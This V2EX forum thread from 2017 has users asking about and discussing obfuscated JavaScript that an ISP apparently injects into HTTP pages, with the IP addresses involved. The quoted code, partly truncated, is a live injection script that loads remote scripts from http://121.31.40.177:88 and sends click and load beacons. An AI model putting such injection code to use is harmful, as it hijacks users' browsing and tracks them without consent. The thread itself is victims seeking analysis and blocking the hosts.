V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
cytlz
V2EX  ›  宽带症候群

这段 JS 劫持代码什么意思?

  •  
  •   cytlz · 2017-12-19 14:25:57 +08:00 · 4194 次点击
    这是一个创建于 2523 天前的主题,其中的信息可能已经有所发展或是发生改变。
    var _$ = ['DIV20170608', "document", "getElementsByTagName", 'div', "length", "push", "clientWidth", "clientHeight", "createElement", 'script', "src", 'http://121.31.40.177:88/x.js?id=', '&s=', 'x', "id", "style", "display", 'none', "dataset", "isReplace", "appendChild", "overflow", 'hidden', " onload", "bind", 'Y', "innerHTML", '', 'block', "width", 'px', "height", "activeElement", "parentElement", "getAttribute", 'id', "indexOf", 'http://121.31.40.177:88/s.do?id=h00000003&click', "offsetWidth", "offsetHeight", "parentNode", "isPush", "addEventListener", 'load', 'http://121.31.40.177:88/s.do?id=h00000003&loadNum=']; !
    function() {
    var a = [];
    var b = 0x3;
    var c = _$[0];
    var d = 0x0;
    var e = {};
    var f = false;
    var g = 0x0;
    function loadAd() {
    var k = [0x78, 0x7d, 0xa0, 0xb4, 0xc8, 0xea, 0xfa, 0x12c, 0x150, 0x168, 0x1d4, 0x1e0, 0x1f4, 0x244, 0x280, 0x2d8, 0x2f8, 0x3c0];
    var l = [0x3c, 0x7d, 0x258, 0x96, 0xc8, 0x3c, 0xfa, 0xfa, 0x118, 0x96, 0x3c, 0xa0, 0xc8, 0x5a, 0x3c, 0x5a, 0x3c, 0x3c];
    var m = window[_$[1]][_$[2]](_$[3]);
    for (var n = 0x0; n - 0x1) {
    r = !0x0; (new Image)[_$[10]] = _$[37];
    clearTimeout(q)
    };
    if (!r) {
    q = setTimeout(function() {
    checkClick(o)
    },
    0x32)
    }
    };
    function findEle(o, p) {
    p = p || 0x3;
    if (!o) {
    return false
    };
    for (var q = 0x0; q
    12 条回复    2017-12-24 14:10:20 +08:00
    cytlz
        1
    cytlz  
    OP
       2017-12-19 14:28:22 +08:00
    121 点 31 点 40 点 177:88/l.js
    cytlz
        2
    cytlz  
    OP
       2017-12-19 14:29:14 +08:00
    求 JS 注释,这段代码是干什么的?
    wxsm
        3
    wxsm  
       2017-12-19 21:23:54 +08:00 via iPhone
    弹广告用的
    lukunlin
        4
    lukunlin  
       2017-12-20 17:20:54 +08:00
    不过就是加密后的代码而已,加密也没什么难的,先是用 window.getElementByTagName('div')
    然后创建一个 image 对象,就加载广告图片呗。
    neowin
        5
    neowin  
       2017-12-23 07:33:53 +08:00
    是访问新浪科技、新浪财经时出现的么?
    cytlz
        6
    cytlz  
    OP
       2017-12-23 12:39:28 +08:00
    @neowin
    开机联网上的第一个 http 协议的网站就弹。以后就不弹了,只要换 IP 就再弹一下。
    我发的那个 IP 已经不弹了,昨天换了另一个 60 点 12 点 123 点 157:88/l.js
    今天早上 157 打不开了,换成 250 了.我看他还换什么 IP
    cytlz
        7
    cytlz  
    OP
       2017-12-23 15:51:57 +08:00
    @neowin 应该是第一个 http 协议,但后缀必须为 html 的站点才执行那个脚本,浏览器状态栏就显示了一下那个 IP 地址被加载了。但并没有任何广告弹出来。同目录下还有个 i.js ,看样子好象是劫持京东的代码
    cytlz
        8
    cytlz  
    OP
       2017-12-23 15:52:43 +08:00
    @lukunlin 并没有广告弹出来,页面上也没有加任何广告。
    cytlz
        9
    cytlz  
    OP
       2017-12-23 15:53:07 +08:00
    @wxsm 没有广告弹出来
    cytlz
        10
    cytlz  
    OP
       2017-12-23 15:53:35 +08:00
    执行的参数是 l.js?_veri=20121009
    neowin
        11
    neowin  
       2017-12-24 09:25:28 +08:00
    @cytlz 和你的遭遇完全相同。我这京东被支持到广告联盟……然后新浪财经和科技,打开任何其下的新闻页面,状态栏就会有 60.12.123.157 ;121.31.40.177 ,页面要等好几秒才打开,正常都是秒开。我只能在防火墙里 ban 掉这两个 IP,这两天还算正常。话说,这事说到底,就是联通干的?!
    cytlz
        12
    cytlz  
    OP
       2017-12-24 14:10:20 +08:00
    @neowin 今天换成 42.236.73.204:84 了,代码也变了。a.js c.js s.js k.js.我都给加到 ADB 里过滤了,现在只能发现一个过滤一个。他这东西也不弹窗口。不知道做什么的,烦的很,只要是 html 的后缀他就往里插 JS,然后就卡个好秒才能正常打开页面。但是他这东西只要加载过一次,今天就不加载了,除非你断开网络换 IP 他才重新加载。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2869 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 20ms · UTC 02:47 · PVG 10:47 · LAX 18:47 · JFK 21:47
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.